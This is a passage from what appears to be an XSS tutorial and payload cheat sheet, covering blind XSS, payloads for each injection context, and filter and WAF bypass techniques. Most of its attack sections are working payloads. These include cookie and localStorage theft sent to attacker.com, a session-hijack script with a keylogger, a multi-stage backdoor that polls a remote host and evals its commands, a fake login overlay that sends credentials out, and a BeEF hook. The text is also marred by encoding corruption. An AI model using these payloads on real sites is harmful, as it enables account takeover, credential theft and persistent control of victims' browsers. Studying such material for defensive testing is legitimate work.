โโโ Multiple intermediate steps
โโโ Obfuscated code
โ
Requires specialized tools:
โโโ ๐ ๏ธ Browser dev tools
โโโ ๐ฏ DOM Invader (Burp Suite)
โโโ ๐ฌ DAST tools with browser engines
โโโ ๐ Manual code review๐ Characteristics
โ
Entirely client-side
โ
Payload in URL fragment (#)
โ
Server never sees malicious data
โ
JavaScript processes the payload
โ
Bypasses server-side security
โ
Bypasses WAF/IDS completely
โ Hard to detect with traditional tools
โ Requires JavaScript code audit
๐ด STEALTHIEST XSS type4๏ธโฃ ๐ BLIND XSS
๐ Definition -
Blind Cross-Site Scripting is a type of XSS vulnerability where injected script code executes in a hidden or restricted part of an application, such as admin panels, log viewers, or backend systems, and the attacker does not see the result directly.
๐ฏ What Makes Blind XSS Special
๐ REGULAR XSS:
โโโ Attacker injects payload
โโโ Attacker sees immediate result
โโโ Instant feedback
๐ BLIND XSS:
โโโ Attacker injects payload
โโโ No immediate feedback
โโโ Payload stored in system
โโโ Executes later (hours/days)
โโโ In different location (admin panel)
โโโ Attacker notified via callback๐ Attack Flow
๐ฏ PHASE 1: INJECTION (Public Area)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ค Attacker
โ
โ Submits payload in:
โ โข ๐ Contact form
โ โข ๐ซ Support ticket
โ โข ๐ฌ User feedback
โ โข โ ๏ธ Error report
โ
โ
๐พ Application Database
โ
โ Stores payload
โ
โ
โณ WAITING GAME
(Could be hours or days)
๐ฏ PHASE 2: EXECUTION (Private Area)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ๏ธ Admin/Staff Member
โ
โ Logs into backend
โ Views submitted data
โ
โ
๐ Backend System
โ
โ Retrieves payload from DB
โ Displays without encoding
โ
โ
๐ฅ๏ธ Admin's Browser
โ
โ ๐ฅ EXECUTES PAYLOAD
โ
โ
๐ Attacker's Server
โ
โ ๐ก Receives callback:
โ โข Admin's cookies
โ โข Session tokens
โ โข Backend URL
โ โข Screenshots
โ
โ
๐ฏ HIGH-VALUE TARGET COMPROMISED๐ฃ Blind XSS Payload Structure
// ๐ฏ Standard Blind XSS payload with callback
<script>
// ๐ Collect information
var data = {
url: window.location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage),
dom: document.documentElement.outerHTML
};
// ๐ค Exfiltrate to attacker's server
fetch('https://attacker.com/blind-xss', {
method: 'POST',
body: JSON.stringify(data)
});
// ๐ผ๏ธ Or use Image beacon (more stealthy)
new Image().src = 'https://attacker.com/xss?data=' + btoa(JSON.stringify(data));
</script>๐ฏ Common Blind XSS Locations
๐ด HIGH-VALUE TARGETS:
1๏ธโฃ ๐ ADMIN PANELS:
โโโ View user submissions
โโโ Review support tickets
โโโ Manage user accounts
2๏ธโฃ ๐ LOG VIEWERS:
โโโ Error logs
โโโ Activity logs
โโโ Audit trails
โโโ Analytics dashboards
3๏ธโฃ ๐ซ SUPPORT SYSTEMS:
โโโ Ticket management
โโโ Help desk software
โโโ Customer feedback
4๏ธโฃ ๐ง EMAIL SYSTEMS:
โโโ Webmail interfaces
โโโ Email administration
โโโ Marketing platforms
5๏ธโฃ ๐ NOTIFICATION CENTERS:
โโโ Admin notifications
โโโ Alert systems
โโโ Real-time monitors
6๏ธโฃ ๐ REPORTING TOOLS:
โโโ Business intelligence
โโโ Data visualization
โโโ Export functions
7๏ธโฃ ๐ SEARCH RESULTS:
โโโ Admin search
โโโ Internal search tools
โโโ Content indexing
8๏ธโฃ ๐ฅ USER MANAGEMENT:
โโโ Profile viewers
โโโ Account details
โโโ User statistics๐ฌ Testing for Blind XSS
The best tool for blind XSS testing is XSS Hunter, which provides callback infrastructure.
๐ฏ TESTING STRATEGY:
1๏ธโฃ Identify all input points
2๏ธโฃ Insert unique blind XSS payloads
3๏ธโฃ Wait for callback notifications
4๏ธโฃ Analyze results
๐ EXAMPLE TESTING FLOW:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ INPUT FIELDS TO TEST: โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ Contact form - Name field โ
โ โ Contact form - Email field โ
โ โ Contact form - Message field โ
โ โ Support ticket - Subject โ
โ โ Support ticket - Description โ
โ โ Feedback form - Comments โ
โ โ Bug report - Title โ
โ โ Bug report - Steps to reproduce โ
โ โ Profile - Bio section โ
โ โ Profile - Display name โ
โ โ File upload - Filename โ
โ โ HTTP headers - User-Agent โ
โ โ HTTP headers - Referer โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๏ธ Why Blind XSS is Dangerous
๐ IMPACT MULTIPLIER:
โโโ Targets privileged users (admins/staff)
โโโ Access to sensitive systems
โโโ Higher privilege accounts
โโโ Internal network access
โโโ More sensitive data
โโโ Greater impact per victim
โก RISK FACTORS:
โ
Admin/staff privileges
โ
Access to all user data
โ
System configuration access
โ
Can modify platform settings
โ
Can affect all users
๐ฅ COMPLETE PLATFORM COMPROMISE๐ Characteristics
โ
No immediate feedback to attacker
โ
Payload stored in system
โ
Executes in different context (backend)
โ
Targets high-privilege users
โ
Requires callback mechanism
โ
Hard to test without tools
๐ฅ HIGH-VALUE TARGETS
๐ฅ POTENTIALLY MOST IMPACTFUL๐ฏ 4. XSS CONTEXTS & EXPLOITATION
๐ก Understanding Execution Contexts
๐ฏ KEY CONCEPT:
"Context" = WHERE your input lands in the HTML/JavaScript
Different contexts require different payloads!
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ๐ Context determines: โ
โ โโโ What characters are dangerous โ
โ โโโ How to break out โ
โ โโโ Which payload will work โ
โ โโโ How to bypass filters โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ1๏ธโฃ ๐ HTML CONTEXT
When input lands directly in HTML body:
<!-- ๐ฏ Normal Response -->
<div>Welcome, User123</div>
<!-- โ ๏ธ Vulnerable Code -->
<div>Welcome, [USER_INPUT]</div>
<!-- ๐ฅ Attack -->
<div>Welcome, <script>alert(1)</script></div>Exploitation Payloads:
<!-- ๐ Classic Script Tag -->
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script src="https://evil.com/xss.js"></script>
<!-- ๐ผ๏ธ Image Tag with Error Handler -->
<img src=x onerror=alert(1)>
<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>
<!-- ๐จ SVG -->
<svg onload=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><animatetransform onbegin=alert(1)>
<!-- ๐ Other Tags -->
<iframe src="javascript:alert(1)">
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>2๏ธโฃ ๐ค ATTRIBUTE CONTEXT
When input lands inside HTML attribute:
<!-- โ ๏ธ Vulnerable Code -->
<input type="text" value="[USER_INPUT]">
<!-- ๐ฅ Attack: Break Out of Attribute -->
<input type="text" value="" onfocus="alert(1)" autofocus="">
<!-- Or -->
<input type="text" value=""><script>alert(1)</script>">Context-Specific Payloads:
<!-- ๐ฏ Inside value attribute -->
Input: " onfocus=alert(1) autofocus="
Result: <input value="" onfocus=alert(1) autofocus="">
<!-- ๐ฏ Inside src/href -->
Input: javascript:alert(1)
Result: <a href="javascript:alert(1)">Link</a>
<!-- ๐ฏ Inside event handler (already in JS context) -->
Original: <div onclick="alert('Hello [INPUT]')">
Input: '); alert(document.cookie); //
Result: <div onclick="alert('Hello '); alert(document.cookie); //')">
<!-- ๐ฏ Inside style attribute -->
Input: </style><script>alert(1)</script>
Result: <div style="</style><script>alert(1)</script>">
<!-- ๐ฏ Data attributes -->
Input: x" onload="alert(1)
Result: <img data-value="x" onload="alert(1)">Breaking Out of Quotes:
<!-- ๐ฏ Double Quotes -->
"><script>alert(1)</script>
" onfocus=alert(1) autofocus="
" onclick=alert(1) "
<!-- ๐ฏ Single Quotes -->
'><script>alert(1)</script>
' onfocus=alert(1) autofocus='
' onclick=alert(1) '
<!-- ๐ฏ No Quotes (if attribute value not quoted) -->
onfocus=alert(1) autofocus
onmouseover=alert(1)3๏ธโฃ ๐ JAVASCRIPT CONTEXT
When input lands inside <script> tags or inline JavaScript:
// โ ๏ธ Vulnerable Code Pattern 1
<script>
var username = '[USER_INPUT]';
</script>
// ๐ฅ Attack: String Termination
Input: '; alert(1); //
Result: var username = ''; alert(1); //';
// โ ๏ธ Vulnerable Code Pattern 2
<script>
var data = {name: "[USER_INPUT]"};
</script>
// ๐ฅ Attack: Object Injection
Input: ", role: "admin
Result: var data = {name: "", role: "admin"};
// โ ๏ธ Vulnerable Code Pattern 3
<script>
showMessage('[USER_INPUT]');
</script>
// ๐ฅ Attack: Function Escape
Input: '); alert(1); //
Result: showMessage(''); alert(1); //');Advanced JavaScript Context Payloads:
// ๐ฏ String Context Escapes
';alert(1);//
';alert(1);'
\';alert(1);//
';alert(String.fromCharCode(88,83,83));//
// ๐ฏ Bypassing Backslash Filtering
\';alert(1);//
\\';alert(1);//
// ๐ฏ Multi-line Comments
*/alert(1);//
// ๐ฏ Template Literals
${alert(1)}
`${alert(1)}`
// ๐ฏ Function Context
)};alert(1);//
));alert(1);//
// ๐ฏ Array Context
];alert(1);//
[1,2,3];alert(1);//
// ๐ฏ Object Context
}};alert(1);//
});alert(1);//
// ๐ฏ JSONP Callback
callback({"data":"value"});alert(1);//Real-World Example:
// โ ๏ธ Vulnerable Analytics Code
<script>
var trackingData = {
userId: '[USER_ID]',
page: '[PAGE_NAME]',
referrer: '[REFERRER]'
};
sendAnalytics(trackingData);
</script>
// ๐ฅ Attack on PAGE_NAME parameter
Input: ", userId: "admin", xss: alert(1), fake: "
Result:
var trackingData = {
userId: '123',
page: '", userId: "admin", xss: alert(1), fake: "',
referrer: 'google.com'
};
// ๐ฅ Executes: alert(1)4๏ธโฃ ๐ URL CONTEXT
When input used in href, src, or action attributes:
<!-- โ ๏ธ Vulnerable Code -->
<a href="[USER_INPUT]">Click here</a>
<!-- ๐ฅ JavaScript Protocol -->
<a href="javascript:alert(1)">Click here</a>
<!-- ๐ฅ Data Protocol -->
<a href="data:text/html,<script>alert(1)</script>">Click here</a>
<!-- ๐ฅ VBScript (IE only) -->
<a href="vbscript:msgbox(1)">Click here</a>URL Context Exploitation:
<!-- ๐ฏ Direct JavaScript -->
javascript:alert(1)
javascript:alert(document.cookie)
javascript:eval(atob('YWxlcnQoMSk=')) <!-- Base64 encoded -->
<!-- ๐ฏ Data URLs -->
data:text/html,<script>alert(1)</script>
data:text/html,<img src=x onerror=alert(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<!-- ๐ฏ About Protocol -->
about:blank
<!-- ๐ฏ File Protocol -->
file:///etc/passwd <!-- Local file access -->
<!-- ๐ฏ With URL Encoding -->
javascript:alert%281%29
javascript:alert(1)
javascript:alert(1)
<!-- ๐ฏ Obfuscated -->
java	script:alert(1) <!-- Tab character -->
java
script:alert(1) <!-- Newline -->
java
script:alert(1) <!-- Carriage return -->
jAvAsCrIpT:alert(1) <!-- Case insensitive -->Meta Refresh XSS:
<!-- ๐ฏ Meta tag redirect -->
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">5๏ธโฃ ๐จ CSS CONTEXT
When input lands in <style> tags or style attributes:
<!-- โ ๏ธ Vulnerable Code -->
<style>
body {
background: [USER_INPUT];
}
</style>
<!-- ๐ฅ Attack: Break Out -->
</style><script>alert(1)</script><style>
<!-- ๐ฅ Or use expression() (IE only) -->
<style>
body {
background: expression(alert(1));
}
</style>CSS Context Payloads:
<!-- ๐ฏ Breaking Out of Style Tag -->
</style><script>alert(1)</script><style>
</style><img src=x onerror=alert(1)><style>
<!-- ๐ฏ CSS Injection (IE/Old Browsers) -->
expression(alert(1))
expression(alert(document.cookie))
<!-- ๐ฏ Import External CSS -->
@import 'https://attacker.com/xss.css';
<!-- ๐ฏ CSS with JavaScript URL -->
background: url('javascript:alert(1)');
<!-- ๐ฏ Unicode Escapes -->
\3c script\3e alert(1)\3c /script\3e <!-- <script>alert(1)</script> -->
<!-- ๐ฏ Style Attribute Context -->
" onload="alert(1)
; background:url('javascript:alert(1)');6๏ธโฃ ๐ JSON CONTEXT
When input reflected in JSON responses:
// โ ๏ธ Vulnerable Code
{"username": "[USER_INPUT]"}
// ๐ฅ Attack: Break Out of String
Input: ", "role": "admin", "xss": "
Result: {"username": "", "role": "admin", "xss": ""}
// ๐ฅ If JSON parsed and used in innerHTML
Input: <img src=x onerror=alert(1)>
Result: {"username": "<img src=x onerror=alert(1)>"}
// ๐ฅ If this JSON is rendered: XSS!7๏ธโฃ ๐จ SVG CONTEXT
SVG has multiple XSS vectors:
<!-- ๐ฏ Basic SVG XSS -->
<svg onload=alert(1)>
<!-- ๐ฏ SVG with Script Tag -->
<svg><script>alert(1)</script></svg>
<!-- ๐ฏ SVG Animation -->
<svg><animatetransform onbegin=alert(1)>
<!-- ๐ฏ SVG with href -->
<svg><a href="javascript:alert(1)"><text>Click</text></a></svg>
<!-- ๐ฏ SVG with foreignObject -->
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<!-- ๐ฏ SVG Events -->
<svg><circle onload=alert(1) />
<svg><rect onmouseover=alert(1) />
<svg><path onfocus=alert(1) />
<!-- ๐ฏ SVG with XLink -->
<svg xmlns="http://www.w3.org/2000/svg">
<script href="https://attacker.com/xss.js"/>
</svg>๐ฌ Context Detection Strategy
๐ฏ STEP-BY-STEP CONTEXT ANALYSIS:
1๏ธโฃ Submit Test String:
Input: UNIQUE_STRING_12345
2๏ธโฃ View Page Source (Ctrl+U)
Search for: UNIQUE_STRING_12345
3๏ธโฃ Identify Context:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Found In โ Context โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโโฃ
โ <div>STRING</div> โ HTML Body โ
โ <input value="STRING"> โ Attribute โ
โ var x = 'STRING'; โ JavaScript โ
โ <a href="STRING"> โ URL โ
โ <style>STRING</style> โ CSS โ
โ {"data":"STRING"} โ JSON โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
4๏ธโฃ Choose Appropriate Payload
5๏ธโฃ Test Execution
6๏ธโฃ Refine if Filtered๐ ๏ธ 5. ADVANCED EXPLOITATION TECHNIQUES
๐ง Filter Bypass Techniques
๐ฏ COMMON FILTERS & BYPASSES:
๐ FILTER: Blocks "<script>"
๐ BYPASSES:
โโโ <ScRiPt>alert(1)</ScRiPt> (Case variation)
โโโ <scr<script>ipt>alert(1)</script> (Nested tags)
โโโ <img src=x onerror=alert(1)> (Alternative tag)
โโโ <svg onload=alert(1)> (SVG vector)
โโโ <iframe src="javascript:alert(1)"> (IFrame)
๐ FILTER: Blocks "javascript:"
๐ BYPASSES:
โโโ JaVaScRiPt:alert(1) (Case variation)
โโโ java	script:alert(1) (Tab character)
โโโ java
script:alert(1) (Newline)
โโโ javascript:alert(1) (HTML entity)
โโโ data:text/html,<script>alert(1)</script> (Data URI)
โโโ vbscript:msgbox(1) (VBScript - IE only)
๐ FILTER: Blocks "alert"
๐ BYPASSES:
โโโ prompt(1)
โโโ confirm(1)
โโโ console.log(1)
โโโ window['ale'+'rt'](1)
โโโ window['al\x65rt'](1)
โโโ eval('ale'+'rt(1)')
โโโ eval(atob('YWxlcnQoMSk=')) (Base64)
โโโ Function('alert(1)')()
โโโ top['al'+'ert'](1)
โโโ parent['alert'](1)
๐ FILTER: Blocks "document.cookie"
๐ BYPASSES:
โโโ document['cookie']
โโโ document[`cookie`]
โโโ window['document']['cookie']
โโโ top.document.cookie
โโโ parent.document.cookie
โโโ frames[0].document.cookie
๐ FILTER: Blocks Parentheses ()
๐ BYPASSES:
โโโ <svg onload=alert`1`> (Template literals)
โโโ <svg onload=alert.call`1`>
โโโ <img src=x onerror=alert.bind`1`()>
โโโ throw onerror=alert,1 (Throw statement)
๐ FILTER: Blocks Spaces
๐ BYPASSES:
โโโ <img/src=x/onerror=alert(1)> (Forward slash)
โโโ <img%09src=x%09onerror=alert(1)> (Tab - %09)
โโโ <img%0asrc=x%0aonerror=alert(1)> (Newline - %0a)
โโโ <img%0dsrc=x%0donerror=alert(1)> (Carriage return - %0d)
โโโ <svg><script>alert(1)</script></svg> (No spaces needed)
๐ FILTER: Blocks Quotes (' ")
๐ BYPASSES:
โโโ <img src=x onerror=alert(1)> (No quotes needed)
โโโ <iframe src=javascript:alert(1)> (No quotes)
โโโ <svg onload=alert(1)> (No quotes)
โโโ <img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
๐ FILTER: Strips/Encodes < and >
๐ BYPASSES:
โโโ Use existing tags with events
โโโ <script>alert(1)</script> (HTML entities - sometimes decoded)
โโโ %3Cscript%3Ealert(1)%3C/script%3E (URL encoding - sometimes decoded)
โโโ Context-specific: break out of attributes instead
๐ FILTER: Blocks Event Handlers (on*)
๐ BYPASSES:
โโโ <svg><script>alert(1)</script></svg>
โโโ <iframe src="javascript:alert(1)">
โโโ <object data="javascript:alert(1)">
โโโ <embed src="javascript:alert(1)">
โโโ <a href="javascript:alert(1)">Click</a>
๐ FILTER: Length Limitations
๐ BYPASSES:
โโโ <script src=//ว.โจ></script> (Short domain)
โโโ <svg onload=eval(name)> (Use window.name)
โโโ Import from external: <script src=//evil.com/x.js></script>
โโโ Use location.hash to store payload๐ก๏ธ WAF Bypass Techniques
๐ก๏ธ WEB APPLICATION FIREWALL EVASION:
๐ฏ TECHNIQUE 1: ENCODING
โโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ HTML Entity Encoding -->
<script>alert(1)</script>
<script>alert(1)</script>
<!-- ๐ฏR UL Encoding -->
%3Cscript%3Ealert(1)%3C/script%3E
<!-- ๐ฏR Duble URL Encoding -->
%253Cscript%253Ealert(1)%253C/script%253E
<!-- ๐ฏR Uicode Encoding -->
\u003cscript\u003ealert(1)\u003c/script\u003e
<!-- ๐ฏR Hx Encoding -->
\x3cscript\x3ealert(1)\x3c/script\x3e
<!-- ๐ฏR Mixed Encodin -->
%3C%73%63%72%69%70%74%3Ealert(1)%3C/script%3E
๐ฏ TECHNIQUE 2: OBFUSCATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ String Concatenation -->
<script>eval('al'+'ert(1)')</script>
<script>eval('al\x65rt(1)')</script>
<!-- ๐ฏR Base64 ncoding -->
<script>eval(atob('YWxlcnQoMSk='))</script>
<!-- ๐ฏR Charactr Code -->
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<!-- ๐ฏR Octal/Hex -->
&t;script>eval('\141\154\145\162\164\50\61\51')</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>
๐ฏ TECHNIQUE 3: CASE MANIPULATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<ScRiPt>alert(1)</sCrIpT>
<IMG SRC=x ONERROR=alert(1)>
<SvG OnLoAd=alert(1)>
๐ฏ TECHNIQUE 4: WHITESPACE INSERTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<img/src=x/onerror=alert(1)>
<img src=x onerror=alert(1)>
<img%09src=x%09onerror=alert(1)> <!-- Tab -->
<img%0asrc=x%0aonerror=alert(1)> <!-- Newline -->
๐ฏ TECHNIQUE 5: TAG BREAKING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ If WAF checks complete tag -->
<img src=x onerror
=alert(1)>
<img src=x
onerror=alert(1)>
<!-- ๐ฏ Null bytes (some parsers) -->
<img src=x%00onerror=alert(1)>
๐ฏ TECHNIQUE 6: USING COMMENTS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ HTML Comments -->
<img src=x o<!--comment-->nerror=alert(1)>
<scr<!--comment-->ipt>alert(1)</scr<!--comment-->ipt>
<!-- ๐ฏR JavaScrpt Comments -->
<script>alert/*comment*/(1)</script>
<script>/*comment*/alert(1)/*comment*/</script>
๐ฏ TECHNIQUE 7: ALTERNATIVE PROTOCOLS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
java	script:alert(1)
java
script:alert(1)
java
script:alert(1)
javascript:alert(1)
data:text/html,<script>alert(1)</script>
๐ฏ TECHNIQUE 8: POLYGLOT PAYLOADS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<!-- ๐ฏ Works in multiple contexts -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
๐ฏ TECHNIQUE 9: DOM CLOBBERING
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<form name=getElementById>
<img name=x src=y onerror=alert(1)>
๐ฏ TECHNIQUE 10: RARE TAGS
โโโโโโโโโโโโโโโโโโโโโโโโโโ
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<keygen onfocus=alert(1) autofocus>
<embed src=x onerror=alert(1)>๐ฃ Advanced Payload Techniques
Self-Contained Payloads -
// ๐ฏ Payload that works anywhere
<script>fetch('//attacker.com?'+document.cookie)</script>
// ๐ฏ Minimal payload
<svg onload=alert(1)>
// ๐ฏ No quotes needed
<img src=x onerror=alert(document.cookie)>
// ๐ฏ Works in attributes
" onfocus=fetch('//attacker.com?c='+document.cookie) autofocus="
// ๐ฏ Universal polyglot
javascript:eval('al\x65rt(1)')Multi-Stage Payloads -
// ๐ฏ Stage 1: Load external script
<script src=//attacker.com/x.js></script>
// ๐ฏ Stage 2 (x.js): Full exploitation code
var s = document.createElement('script');
s.src = '//attacker.com/stage2.js';
document.body.appendChild(s);
// ๐ฏ Stage 3: Persistent backdoor
setInterval(function() {
fetch('//attacker.com/cmd')
.then(r => r.text())
.then(eval);
}, 5000); // Poll for commands every 5 secondsCookie Stealing -
// ๐ฏ Method 1: Image beacon
<script>
new Image().src='//attacker.com/steal?c='+document.cookie;
</script>
// ๐ฏ Method 2: Fetch API
<script>
fetch('//attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookie: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage)
})
});
</script>
// ๐ฏ Method 3: Form submission
<script>
var f = document.createElement('form');
f.method = 'POST';
f.action = '//attacker.com/steal';
var i = document.createElement('input');
i.name = 'data';
i.value = document.cookie;
f.appendChild(i);
document.body.appendChild(f);
f.submit();
</script>
// ๐ฏ Method 4: XMLHttpRequest
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', '//attacker.com/steal', true);
xhr.send(document.cookie);
</script>Session Hijacking -
// ๐ฏ Complete session hijack payload
<script>
(function() {
// ๐ Collect all sensitive data
var data = {
url: window.location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage),
sessionStorage: JSON.stringify(sessionStorage),
dom: document.documentElement.innerHTML,
forms: []
};
// ๐ฃ Capture all form data
document.querySelectorAll('form').forEach(function(form) {
var formData = {};
form.querySelectorAll('input, textarea, select').forEach(function(field) {
if(field.name) {
formData[field.name] = field.value;
}
});
data.forms.push(formData);
});
// ๐ค Send to attacker
fetch('https://attacker.com/hijack', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify(data)
});
// โจ๏ธ Install keylogger
document.addEventListener('keypress', function(e) {
fetch('https://attacker.com/keys', {
method: 'POST',
body: JSON.stringify({
key: e.key,
target: e.target.name,
time: Date.now()
})
});
});
})();
</script>Phishing Attack -
<script>
// ๐ญ Replace entire page with fake login
document.body.innerHTML = `
<div style="max-width:400px;margin:100px auto;padding:40px;box-shadow:0 0 20px rgba(0,0,0,0.1);border-radius:8px;font-family:Arial,sans-serif;">
<img src="${window.location.origin}/logo.png" style="display:block;margin:0 auto 30px;width:200px;">
<h2 style="text-align:center;color:#333;margin-bottom:10px;">Session Expired</h2>
<p style="text-align:center;color:#666;margin-bottom:30px;font-size:14px;">Please log in again to continue</p>
<form id="phish" style="display:flex;flex-direction:column;gap:15px;">
<input type="email" name="email" placeholder="Email" required style="padding:12px;border:1px solid #ddd;border-radius:4px;font-size:14px;">
<input type="password" name="password" placeholder="Password" required style="padding:12px;border:1px solid #ddd;border-radius:4px;font-size:14px;">
<button type="submit" style="padding:12px;background:#007bff;color:white;border:none;border-radius:4px;font-size:16px;cursor:pointer;">Log In</button>
</form>
</div>
`;
document.getElementById('phish').onsubmit = function(e) {
e.preventDefault();
var formData = new FormData(this);
fetch('https://attacker.com/phish', {
method: 'POST',
body: JSON.stringify({
site: window.location.hostname,
email: formData.get('email'),
password: formData.get('password'),
cookies: document.cookie
})
}).then(() => {
window.location.reload(); // ๐ Reload after stealing credentials
});
};
</script>BeEF Hook Integration -
// ๐ฃ Load Browser Exploitation Framework
<script src="http://attacker.com:3000/hook.js"></script>
// ๐ฏ Now attacker has full control over victim's browser:
// - ๐ธ Take screenshots
// - โจ๏ธ Log keystrokes
// - โก Execute commands
// - ๐ Proxy through victim
// - ๐ฏ Exploit browser vulnerabilities๐ฅ 6. ATTACK IMPACT & REAL-WORLD CASES
๐ Attack Capabilities Matrix
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WHAT ATTACKERS CAN DO WITH XSS โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ
โ ๐ช SESSION HIJACKING ๐ด CRITICAL โ
โ โโโ Steal session cookies โ
โ โโโ Impersonate victim โ
โ โโโ Bypass authentication โ
โ โโโ Full account takeover โ
โ โ
โ ๐ CREDENTIAL THEFT ๐ด CRITICAL โ
โ โโโ Inject fake login forms โ
โ โโโ Phishing on legitimate domain โ
โ โโโ Capture passwords โ
โ โโโ Steal API keys/tokens โ
โ โ
โ ๐ DATA EXFILTRATION ๐ด CRITICAL โ
โ โโโ Read sensitive page data โ
โ โโโ Extract personal information โ
โ โโโ Download private files โ
โ โโโ Access restricted content โ
โ โ
โ ๐ญ DEFACEMENT ๐ก MEDIUM โ
โ โโโ Modify page content โ
โ โโโ Display malicious messages โ
โ โโโ Damage brand reputation โ
โ โโโ Spread misinformation โ
โ โ
โ ๐ฆ MALWARE DISTRIBUTION ๐ด CRITICAL โ
โ โโโ Redirect to malware sites โ
โ โโโ Drive-by downloads โ
โ โโโ Browser exploits โ
โ โโโ Ransomware delivery โ
โ โ
โ ๐ท KEYLOGGING ๐ด CRITICAL โ
โ โโโ Capture all keystrokes โ
โ โโโ Record form inputs โ
โ โโโ Steal credit card details โ
โ โโโ Monitor victim activity โ
โ โ
โ ๐ PRIVACY INVASION ๐ HIGH โ
โ โโโ Access geolocation โ
โ โโโ Request camera/mic access โ
โ โโโ Track browsing history โ
โ โโโ Monitor clipboard โ
โ โ
โ ๐ FURTHER ATTACKS ๐ด CRITICAL โ
โ โโโ Pivot to internal network โ
โ โโโ Exploit other vulnerabilities โ
โ โโโ Spread as worm โ
โ โโโ Chain multiple attacks โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ๐ Real-World Attack Scenarios
Scenario 1: Session Hijacking & Account Takeover
// ๐ฏ Attacker's injected payload
<script>
// 1๏ธโฃ Steal all cookies
var cookies = document.cookie;
// 2๏ธโฃ Send to attacker's server
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({
cookies: cookies,
url: window.location.href,
timestamp: new Date().toISOString()
})
});
// 3๏ธโฃ Optionally keep victim on page (no suspicion)
</script>
โฐ ATTACK TIMELINE:
โโโโโโโโโโโโโโโโโ
14:23:45 - Victim clicks malicious link
14:23:46 - JavaScript executes, cookies sent
14:23:47 - Attacker receives: session_id=abc123xyz...
14:24:00 - Attacker opens browser
14:24:15 - Attacker sets stolen cookie
14:24:20 - Attacker loads site โ LOGGED IN AS VICTIM
14:25:00 - Changes password, email
14:30:00 - Victim locked out permanently
๐ฅ IMPACT:
โข Complete account takeover
โข Victim loses access
โข Attacker controls account
โข Potential identity theftScenario 2: Credential Harvesting (Fake Login)
<script>
// ๐ญ Create a convincing fake login overlay
document.body.innerHTML = `
<div style="
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(0,0,0,0.9);
z-index: 999999;
display: flex;
justify-content: center;
align-items: center;">
<div style="
background: white;
padding: 40px;
border-radius: 8px;
box-shadow: 0 4px 20px rgba(0,0,0,0.3);
max-width: 400px;
width: 90%;">
<img src="` + window.location.origin + `/logo.png" style="width:200px;display:block;margin:0 auto 20px">
<h2 style="text-align:center;color:#333;margin-bottom:10px">Session Expired</h2>
<p style="text-align:center;color:#666;margin-bottom:20px">Please log in again to continue</p>
<form id="phishForm">
<input type="text" name="username" placeholder="Username" required style="width:100%;padding:12px;margin-bottom:15px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;">
<input type="password" name="password" placeholder="Password" required style="width:100%;padding:12px;margin-bottom:20px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;">
<button type="submit" style="width:100%;padding:12px;background:#007bff;color:white;border:none;border-radius:4px;cursor:pointer;font-size:16px">Log In</button>
</form>
